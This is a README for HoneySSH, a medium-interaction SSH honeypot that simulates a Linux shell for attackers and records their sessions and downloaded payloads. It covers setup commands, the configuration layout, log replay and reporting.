🍯 HoneySSH

HoneySSH is a medium interaction honeypot that provides attackers a fully simulated Linux shell to play in.

All commands are simulated and run in a per-session sandbox that's destroyed on disconnect.

Features include:

• A relistic interactive shell.
• 50+ built-in POSIX commands.
• Payloads are captured with the fake scp, wget and curl commands for later analysis.
• Asciicast compatible session keystroke recording and playback.
• In-memory interactive file system.
• Reporting capabilities.
• Machine-readable JSON event log.

Documentation

Most commands have help if you supply the --help flag.

Running the honeypot

# Create a new configuration directory and enter it
mkdir honeypot && cd honeypot

# Initialize the configuration
honeyssh init

# Edit the configuration file config.yaml
nano config.yaml

# (Optional) Generate a new public key from a cryptographically secure RNG

# (Optional) Generate a custom file system image from a container
docker pull ubuntu:latest
docker save ubuntu:latest > tmp-image.tar
honeyssh img2fs tmp-image.tar root_fs.tar.gz

# Test your configuration using the playground functionality
honeyssh playground

# Start the honeypot
honeyssh serve

Configuration

The current directory is used for configuration by default, but can be overridden by the --config flag.

The configuration directory has the following items:

• app.log: SSH server event log newline delimited JSON events described by core/logger/log.proto.
• config.yaml: honeypot configuration, see the contents for descriptions of each item.
• downloads: items downloaded or uploaded by attackers to the honeypot, also includes metadata files about the invocation that caused the file to be placed here.
• private_key: private key the SSH server uses.
• root_fs.tar.gz: the root file system, by default this is adapted from gcr.io/distroless.
• session_logs: interactive session log recordings.

Replaying the logs

Logs are found in the session_logs directory and are recorded in either User Mode Linux (.log extension) or Asciicast (.cast extension) format.

# Print full output of recorded log to a terminal:
honeyssh logs cat path/to/some.log

# Replay the log in "real time" with a maximum pause of 30 seconds:
honeyssh logs play -i 30s path/to/some.log

# Convert a log to asciicast (asciinema) format.
honeyssh logs asciicast path/to/some.log > out.cast

# Convert an old Kippo log to asciicast (asciinema) format.
honeyssh logs asciicast --fix-kippo path/to/some.log > out.cast

Generating interaction reports

honeyssh supports generating basic reports from the application logs file. Run them using honeyssh events REPORT_NAME where the report name is one of the following:

• summary Show a summary of events.
• bugs Show events that may have been caused by bugs in the Honeypot.
• interactions Show a summary of interactive sessions.

All reports allow the following flags:

• --since duration Display events newer than a relative duration. e.g. 24h, 45m, 60s.
• --since-time Display events after a specific date (RFC3339).

Is it safe?

Maybe. As a medium interaction honeypot, it's more dangerous than a firewall that denies all connections, but far safer than giving them access to a machine/container that you hope you've plugged all the holes in.

Consider running honeyssh in gVisor just in case.

Contributions

See CONTRIBUTING.md.

License

honeyssh is licensed under the Apache 2 license, see LICENSE for the full text.

Additional licenses can be found in the third_party/ and vendor/ directories.

Credits

• Inspired by the now defunct Kippo project.